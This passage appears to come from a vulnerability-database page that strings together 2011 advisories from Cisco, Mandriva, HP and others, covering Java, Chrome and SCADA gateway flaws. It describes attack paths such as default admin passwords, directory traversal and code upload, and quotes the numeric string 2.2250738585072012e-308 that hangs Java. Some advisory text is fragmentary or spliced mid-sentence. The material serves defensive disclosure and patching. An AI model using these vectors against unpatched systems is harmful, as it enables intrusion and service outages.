or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone numbers,
and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
All vulnerabilities identified within this Security Advisory were
discovered internally by Cisco.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110223-telepresence-ctrs.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-February-23 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iF4EAREIAAYFAk1lHp0ACgkQQXnnBKKRMNDi6gD9FHcn7qE/BjeRZk7WFzDaN7m/
+eea5C4SM6kS1uQK5DoA/152WnbmatSGw6hJP/e2MSmWOqU1IKU5oxZOO8uqrShf
=xAVI
-----END PGP SIGNATURE-----
.
Revision History
================
+----------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-February-23 | public |
| | | release
| VAR-201102-0182 | CVE-2010-4741 |
Moxa Device Manager MDMTool.exe Buffer Overflow Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201011-0390 |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in MDMUtil.dll in MDMTool.exe in MDM Tool before 2.3 in Moxa Device Manager allows remote MDM Gateways to execute arbitrary code via crafted data in a session on TCP port 54321.
An attacker may exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will likely cause denial-of-service conditions
| VAR-201102-0174 | CVE-2010-4733 | WebSCADA Multiple Product Weak Password Vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms have a default username and password, which makes it easier for remote attackers to obtain superadmin access via the web interface, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 There are multiple vulnerabilities in products that run on the platform, including directory traversal. Other NB100 and NB200 Products that run on the platform may also be affected.By a third party with access to the product, superadmin Authority (Netbiter Top-level permissions ) By acquiring, system files and configuration files may be browsed. In addition, an arbitrary command may be executed by uploading malicious code. A remote attacker can gain access to the super administrator through the web interface
| VAR-201102-0197 | CVE-2010-4730 | WebSCADA Multiple products cgi-bin/read.cgi Directory Traversal Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the page parameter, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Contains a directory traversal vulnerability
| VAR-201102-0173 | CVE-2010-4732 | WebSCADA Multiple products cgi-bin/read.cgi Remote code execution vulnerability |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to execute arbitrary code by using a config.html 2.conf action to replace the logo page's GIF image file with a file containing this code, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter products based on the NB100 and NB200 platforms contain multiple vulnerabilities. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Is A vulnerability that allows arbitrary code execution exists
| VAR-201102-0172 | CVE-2010-4731 | WebSCADA Multiple products cgi-bin/read.cgi Absolute path traversal vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Absolute path traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a full pathname in the file parameter, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter products based on the NB100 and NB200 platforms contain multiple vulnerabilities. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Is An absolute path traversal vulnerability exists
| VAR-201102-0159 | CVE-2011-0782 | Google Chrome Service disruption in ( Application crash ) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Google Chrome before 9.0.597.84 on Mac OS X does not properly mitigate an unspecified flaw in the Mac OS X 10.5 SSL libraries, which allows remote attackers to cause a denial of service (application crash) via unknown vectors. Google Chrome is prone to multiple vulnerabilities.
Attackers may exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks are also possible.
Chrome versions prior to 9.0.597.84 are vulnerable. Google Chrome is a web browser developed by Google (Google)
| VAR-201102-0149 | CVE-2011-0776 | Mac OS X Run on Google Chrome Vulnerability in obtaining important information in sandbox implementation |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The sandbox implementation in Google Chrome before 9.0.597.84 on Mac OS X might allow remote attackers to obtain potentially sensitive information about local files via vectors related to the stat system call. Google Chrome is prone to multiple vulnerabilities.
Attackers may exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks are also possible.
Chrome versions prior to 9.0.597.84 are vulnerable. Google Chrome is a web browser developed by Google (Google)
| VAR-201102-0280 | CVE-2010-4476 |
IBM WebSphere Application Server vulnerable to denial-of-service (DoS)
Related entries in the VARIoT exploits database: VAR-E-201003-0021, VAR-E-201102-0765 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308. plural Oracle Product Java Runtime Environment Components include Java language and APIs There are vulnerabilities that affect availability due to flaws in the handling of.Service disruption by a third party (DoS) An attack may be carried out. IBM WebSphere Application Server (WAS) contains a denial-of-service (DoS) vulnerability. IBM WebSphere Application Server contains a denial-of-service (DoS) vulnerability due to an issue in Java Runtime Environment (JRE). According to the developer: " For other IBM software products that contain an affected version of WAS, require an update. Specifically, WebSphere Process Server (WPS), WebSphere Enterprise Service Bus (WESB), WebSphere Virtual Enterprise (WVE), WebSphere Commerce and others are applicable. Also, IBM HTTP Server is not affected by this vulnerability."A remote attacker may cause a denial-of-service (DoS). Oracle Java is prone to a remote denial-of-service vulnerability.
Successful attacks will cause applications written in Java to hang, creating a denial-of-service condition.
This issue affects both the Java compiler and Runtime Environment.
HP OpenVMS running J2SE 1.42 on Alpha platforms: v 1.42-9 and earlier.
HP OpenVMS running J2SE 1.42 on I64 platforms: v 1.42-6 and earlier.
HP OpenVMS running J2SE 5.0 on Alpha platforms: v 1.50-7 and earlier.
HP OpenVMS running J2SE 5.0 on I64 platforms: v 1.50-6 and earlier.
HP OpenVMS running Java SE 6 on Alpha and I64 platforms: v 6.0-2 and earlier. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2011:054
http://www.mandriva.com/security/
_______________________________________________________________________
Package : java-1.6.0-openjdk
Date : March 27, 2011
Affected: 2009.0, 2010.0, 2010.1, Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been identified and fixed in
java-1.6.0-openjdk:
The JNLP SecurityManager in IcedTea (IcedTea.so) 1.7 before 1.7.7,
1.8 before 1.8.4, and 1.9 before 1.9.4 for Java OpenJDK returns from
the checkPermission method instead of throwing an exception in certain
circumstances, which might allow context-dependent attackers to bypass
the intended security policy by creating instances of ClassLoader
(CVE-2010-4351). NOTE: the
previous information was obtained from the February 2011 CPU. Oracle
has not commented on claims from a downstream vendor that this issue
involves DNS cache poisoning by untrusted applets. NOTE: the previous information was
obtained from the February 2011 CPU. Oracle has not commented on claims
from a downstream vendor that this issue is an untrusted search path
vulnerability involving an empty LD_LIBRARY_PATH environment variable
(CVE-2010-4450). NOTE: the previous information was obtained from the
February 2011 CPU. Oracle has not commented on claims from a downstream
vendor that this issue is related to the lack of framework support by
AWT event dispatch, and/or clipboard access in Applets. NOTE: the previous information was obtained from
the February 2011 CPU. Oracle has not commented on claims from a
downstream vendor that this issue is heap corruption related to the
Verifier and backward jsrs. NOTE: the previous information
was obtained from the February 2011 CPU. Oracle has not commented on
claims from a downstream vendor that this issue is related to Features
set on SchemaFactory not inherited by Validator. NOTE: the previous information
was obtained from the February 2011 CPU. Oracle has not commented
on claims from a downstream vendor that this issue is related to the
exposure of system properties via vectors related to Font.createFont
and exception text (CVE-2010-4471). NOTE: the previous
information was obtained from the February 2011 CPU. Oracle has
not commented on claims from a downstream vendor that this issue
involves the replacement of the XML DSig Transform or C14N algorithm
implementations.
IcedTea 1.7 before 1.7.8, 1.8 before 1.8.5, and 1.9 before 1.9.5
does not properly verify signatures for JAR files that (1) are
partially signed or (2) signed by multiple entities, which allows
remote attackers to trick users into executing code that appears to
come from a trusted source (CVE-2011-0025).
The JNLPClassLoader class in IcedTea-Web before 1.0.1, as used in
OpenJDK Runtime Environment 1.6.0, allows remote attackers to gain
privileges via unknown vectors related to multiple signers and the
assignment of an inappropriate security descriptor. (CVE-2011-0706)
Additionally the java-1.5.0-gcj packages were not rebuilt with the
shipped version on GCC for 2009.0 and Enterprise Server 5 which
caused problems while building the java-1.6.0-openjdk updates,
therefore rebuilt java-1.5.0-gcj packages are being provided with
this advisory as well.
Packages for 2009.0 are provided as of the Extended Maintenance
Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=490
The updated packages have been patched to correct this issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4448
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4465
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4469
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4470
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4471
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4472
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4476
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0025
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0706
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2009.0:
cfea90f1f20d28bf5a2f628e0a910eaa 2009.0/i586/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.i586.rpm
d3188bf2f1da126b4d04e920e331d831 2009.0/i586/java-1.5.0-gcj-devel-1.5.0.0-17.1.7.1mdv2009.0.i586.rpm
1b4994018478f335d49531d9d5e60642 2009.0/i586/java-1.5.0-gcj-javadoc-1.5.0.0-17.1.7.1mdv2009.0.i586.rpm
078af1b826c27ea3c7befc88ace7ebd5 2009.0/i586/java-1.5.0-gcj-src-1.5.0.0-17.1.7.1mdv2009.0.i586.rpm
d1c6cba2035f8eada4e351310ebf7be2 2009.0/i586/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
8b53c26f88092819346654a339b44622 2009.0/i586/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
fc8af257ef8db0d37f3bfff954740c0b 2009.0/i586/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
6cd5f5cdb27e4c8936292aef0aa5010c 2009.0/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
03fdab84535710ac263c08b3870cb062 2009.0/i586/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
0232ce60d1d6e1072e50a13f2b416fcc 2009.0/i586/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
fc94465e0b7e5fe50095c15726d38699 2009.0/SRPMS/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.src.rpm
79aa73d85fe13e803173a9c520ac1bd8 2009.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64:
5728fe31661213beab52fe97f9af91ad 2009.0/x86_64/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.x86_64.rpm
bd5a2a20d168ddcebe29bb109fea38c2 2009.0/x86_64/java-1.5.0-gcj-devel-1.5.0.0-17.1.7.1mdv2009.0.x86_64.rpm
a37818a53a8dbfa85d82bcf3bf83e08f 2009.0/x86_64/java-1.5.0-gcj-javadoc-1.5.0.0-17.1.7.1mdv2009.0.x86_64.rpm
ed9d1baa365606c512783863da3e0bd8 2009.0/x86_64/java-1.5.0-gcj-src-1.5.0.0-17.1.7.1mdv2009.0.x86_64.rpm
b5e70c75ecc67f8f1f7f22ca55059a8b 2009.0/x86_64/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
071df613e884a9faf3525661280b19d6 2009.0/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
81b79e0a8ae29c5bcff3fa6872ad52e9 2009.0/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
b5818cbad798514f02ee26c346d1e077 2009.0/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
d80e3970d9279df1f9dddd46bcb01380 2009.0/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
d72298b296819ab6791e28449d3cf475 2009.0/x86_64/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
fc94465e0b7e5fe50095c15726d38699 2009.0/SRPMS/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.src.rpm
79aa73d85fe13e803173a9c520ac1bd8 2009.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2009.0.src.rpm
Mandriva Linux 2010.0:
bbe3a5e4538edd269e8e8c846d02ec50 2010.0/i586/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
825fa39b02a627993df166acad99e002 2010.0/i586/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
b30390e1d4457964f60630c95b36e768 2010.0/i586/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
f6123d9a0852fabdf596850979b58e4d 2010.0/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
f2ec2f80944f1f401154d2fb2c2ad64d 2010.0/i586/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
68ed360de6ee490d80906fd561459faa 2010.0/i586/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
f7cb05087b53d464084c1d9975f914b1 2010.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.0.src.rpm
Mandriva Linux 2010.0/X86_64:
11e65a4c18288572327dd4c4f8841f94 2010.0/x86_64/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
58bdac45685c3146adb44cb2c006811f 2010.0/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
e9dfc0bd42192c92b2a788809226ff27 2010.0/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
afcef69bfa7804c70df2684b2ed19634 2010.0/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
64ea6c5ab1b71b8a0f163aa1f7581c69 2010.0/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
beb768b3e0714331050baf31a8e88bc9 2010.0/x86_64/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
f7cb05087b53d464084c1d9975f914b1 2010.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.0.src.rpm
Mandriva Linux 2010.1:
c2736e4b08921bb5de8dbad3e13bb988 2010.1/i586/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
884207fa52ea3e168710dfb3988229d5 2010.1/i586/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
a0d0a86bbc5dcc9d2eff2dc2e14ae083 2010.1/i586/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
dc1dd774b5eb1efb1a785b0ff4bc8f94 2010.1/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
41cffbd28ed3d467e465328d8369116a 2010.1/i586/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
ae4064b170d4e2fcd0b4949cd53af79e 2010.1/i586/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
f44cc336bcd85dbfd7c589b1b34e1907 2010.1/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.2.src.rpm
Mandriva Linux 2010.1/X86_64:
556d72a8cf60df24274bb49938a2791c 2010.1/x86_64/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
e7e183d456383ad562cdb9da84e0f899 2010.1/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
035fccb2950b8a87cd4b597c866d5831 2010.1/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
a76c326c10b87a62be32100d0eddd75f 2010.1/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
09ad2b77e3c48b3e16010c8c93fa8f9b 2010.1/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
042beb49ddd872902a8faea3e425b792 2010.1/x86_64/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
f44cc336bcd85dbfd7c589b1b34e1907 2010.1/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.2.src.rpm
Mandriva Enterprise Server 5:
2bf537286d1406c491061e07a73c96ec mes5/i586/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdvmes5.2.i586.rpm
fb125806cc547d2c69cf13ae67c835d5 mes5/i586/java-1.5.0-gcj-devel-1.5.0.0-17.1.7.1mdvmes5.2.i586.rpm
657a9fb9b644be8f8a49442a8210d56a mes5/i586/java-1.5.0-gcj-javadoc-1.5.0.0-17.1.7.1mdvmes5.2.i586.rpm
fff64cbf465a2a701c248ad5cc4c89c6 mes5/i586/java-1.5.0-gcj-src-1.5.0.0-17.1.7.1mdvmes5.2.i586.rpm
8ba9fe5adad781d341ba764b661c8c92 mes5/i586/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
75de95d6064fe9d552795deb0768dfca mes5/i586/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
9f5ccbfff9afb405baadfc67f8173617 mes5/i586/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
70de70d7adaccff5397814d31bd51a96 mes5/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
94b138e8a423f2f8c2ad137577bb4d42 mes5/i586/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
fd7dc4b050b6e07ea7686a72c2704ccd mes5/i586/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
2899dfa5a7491a13e85736bf588913d9 mes5/SRPMS/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.src.rpm
4fc6e8041b5a93a3a71082fb1cbead26 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64:
11c7cdc078dcd9cf30e818f4fb4c4e1f mes5/x86_64/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdvmes5.2.x86_64.rpm
6c6185f429a1672255e30cf00c2af065 mes5/x86_64/java-1.5.0-gcj-devel-1.5.0.0-17.1.7.1mdvmes5.2.x86_64.rpm
f194361aa7a5cfeec17745f0ee158962 mes5/x86_64/java-1.5.0-gcj-javadoc-1.5.0.0-17.1.7.1mdvmes5.2.x86_64.rpm
7d2679d156a618d7ba847ba2ebcede4b mes5/x86_64/java-1.5.0-gcj-src-1.5.0.0-17.1.7.1mdvmes5.2.x86_64.rpm
8ae3d0065764f69d1546a61b895a4244 mes5/x86_64/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
8ef4ab6f5f8f421c1b36dfae807350a5 mes5/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
d504a7493fc86d5750c849f738bb6167 mes5/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
3c044a087cc5225fd9ad138dcea5fa7d mes5/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
b89fa5785567340525aa5b57c8b9440c mes5/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
3dc504dbf7161b1026bf41298118a819 mes5/x86_64/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
2899dfa5a7491a13e85736bf588913d9 mes5/SRPMS/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.src.rpm
4fc6e8041b5a93a3a71082fb1cbead26 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdvmes5.2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFNj4A1mqjQ0CJFipgRAqd9AKDH+zN9xFfcPlQmGWMRSOqb+xjI4QCfbvvt
DHgr6vgcxh6XXAElZkDBIws=
=7L47
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Join Secunia @ FIRST Conference, 12-17 June, Hilton Vienna, Austria
See to the presentation "The Dynamics and Threats of End-Point Software Portfolios" by Secunia's Research Analyst Director, Stefan Frei. Please see the vendor's advisory for more
details. Such input strings represent valid
numbers and can be contained in data supplied by an attacker over the
network, leading to a denial-of-service attack.
For the old stable distribution (lenny), this problem has been fixed
in version 6b18-1.8.3-2~lenny1.
Note that this update introduces an OpenJDK package based on the
IcedTea release 1.8.3 into the old stable distribution. This
addresses several dozen security vulnerabilities, most of which are
only exploitable by malicious mobile code. A notable exception is
CVE-2009-3555, the TLS renegotiation vulnerability. This update
implements the protocol extension described in RFC 5746, addressing
this issue.
This update also includes a new version of Hotspot, the Java virtual
machine, which increases the default heap size on machines with
several GB of RAM. If you run several JVMs on the same machine, you
might have to reduce the heap size by specifying a suitable -Xmx
argument in the invocation of the "java" command.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02729756
Version: 1
HPSBUX02633 SSRT100387 rev.1 - HP-UX running Java, Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2011-02-23
Last Updated: 2011-02-23
------------------------------------------------------------------------------
Potential Security Impact: Remote Denial of Service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential vulnerability has been identified with HP-UX running Java. The vulnerability could be remotely exploited to create a Denial of Service (DoS).
References: CVE-2010-4476
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Any version of Java running on HP-UX 11.11, HP-UX 11.23, or HP-UX 11.31.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2010-4476 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software tool available to resolve the vulnerability. This tool can be used to update all versions of HP-UX Java.
To download the FPUpdater tool, go to https://www.hp.com/go/java then click on the link for the FPUpdater tool
An HP Passport user ID is required to download the FPUpdater tool and its Readme file. For information on registering for an HP Passport user ID, refer to: https://passport2.hp.com
MANUAL ACTIONS: Yes - Update
Update using FPUpdater
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
HP-UX B.11.31
===========
action: update using FPUpdater if Java is installed
END AFFECTED VERSIONS
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
HISTORY
Version:1 (rev.1) - 23 February 2011 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
